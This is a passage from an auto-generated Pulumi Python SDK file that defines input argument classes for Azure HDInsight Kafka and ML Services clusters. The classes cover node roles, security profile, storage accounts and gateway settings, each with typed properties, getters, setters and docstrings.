ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Kafka Management Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Kafka Management Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Kafka Management Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Kafka Management Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Kafka Management Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Kafka Management Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Kafka Management Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Kafka Management Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Kafka Management Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Kafka Management Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Kafka Management Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Kafka Management Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
number_of_disks_per_node: pulumi.Input[int],
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] number_of_disks_per_node: The number of Data Disks which should be assigned to each Worker Node, which can be between 1 and 8. Changing this forces a new resource to be created.
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "number_of_disks_per_node", number_of_disks_per_node)
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="numberOfDisksPerNode")
def number_of_disks_per_node(self) -> pulumi.Input[int]:
"""
The number of Data Disks which should be assigned to each Worker Node, which can be between 1 and 8. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "number_of_disks_per_node")
@number_of_disks_per_node.setter
def number_of_disks_per_node(self, value: pulumi.Input[int]):
pulumi.set(self, "number_of_disks_per_node", value)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class KafkaClusterSecurityProfileArgs:
def __init__(__self__, *,
aadds_resource_id: pulumi.Input[str],
domain_name: pulumi.Input[str],
domain_user_password: pulumi.Input[str],
domain_username: pulumi.Input[str],
ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
msi_resource_id: pulumi.Input[str],
cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
:param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "aadds_resource_id", aadds_resource_id)
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "domain_user_password", domain_user_password)
pulumi.set(__self__, "domain_username", domain_username)
pulumi.set(__self__, "ldaps_urls", ldaps_urls)
pulumi.set(__self__, "msi_resource_id", msi_resource_id)
if cluster_users_group_dns is not None:
pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)
@property
@pulumi.getter(name="aaddsResourceId")
def aadds_resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "aadds_resource_id")
@aadds_resource_id.setter
def aadds_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "aadds_resource_id", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="domainUserPassword")
def domain_user_password(self) -> pulumi.Input[str]:
"""
The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_user_password")
@domain_user_password.setter
def domain_user_password(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_user_password", value)
@property
@pulumi.getter(name="domainUsername")
def domain_username(self) -> pulumi.Input[str]:
"""
The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_username")
@domain_username.setter
def domain_username(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_username", value)
@property
@pulumi.getter(name="ldapsUrls")
def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ldaps_urls")
@ldaps_urls.setter
def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ldaps_urls", value)
@property
@pulumi.getter(name="msiResourceId")
def msi_resource_id(self) -> pulumi.Input[str]:
"""
The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "msi_resource_id")
@msi_resource_id.setter
def msi_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "msi_resource_id", value)
@property
@pulumi.getter(name="clusterUsersGroupDns")
def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_users_group_dns")
@cluster_users_group_dns.setter
def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class KafkaClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class KafkaClusterStorageAccountGen2Args:
def __init__(__self__, *,
filesystem_id: pulumi.Input[str],
is_default: pulumi.Input[bool],
managed_identity_resource_id: pulumi.Input[str],
storage_resource_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "filesystem_id", filesystem_id)
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "managed_identity_resource_id", managed_identity_resource_id)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
@property
@pulumi.getter(name="filesystemId")
def filesystem_id(self) -> pulumi.Input[str]:
"""
The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "filesystem_id")
@filesystem_id.setter
def filesystem_id(self, value: pulumi.Input[str]):
pulumi.set(self, "filesystem_id", value)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="managedIdentityResourceId")
def managed_identity_resource_id(self) -> pulumi.Input[str]:
"""
The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "managed_identity_resource_id")
@managed_identity_resource_id.setter
def managed_identity_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "managed_identity_resource_id", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class MLServicesClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class MLServicesClusterRolesArgs:
def __init__(__self__, *,
edge_node: pulumi.Input['MLServicesClusterRolesEdgeNodeArgs'],
head_node: pulumi.Input['MLServicesClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['MLServicesClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs']):
"""
:param pulumi.Input['MLServicesClusterRolesEdgeNodeArgs'] edge_node: A `edge_node` block as defined above.
:param pulumi.Input['MLServicesClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['MLServicesClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
"""
pulumi.set(__self__, "edge_node", edge_node)
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
@property
@pulumi.getter(name="edgeNode")
def edge_node(self) -> pulumi.Input['MLServicesClusterRolesEdgeNodeArgs']:
"""
A `edge_node` block as defined above.
"""
return pulumi.get(self, "edge_node")
@edge_node.setter
def edge_node(self, value: pulumi.Input['MLServicesClusterRolesEdgeNodeArgs']):
pulumi.set(self, "edge_node", value)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['MLServicesClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['MLServicesClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['MLServicesClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['MLServicesClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['MLServicesClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class MLServicesClusterRolesEdgeNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Edge Node. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Edge Node. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Edge Node should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class MLServicesClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
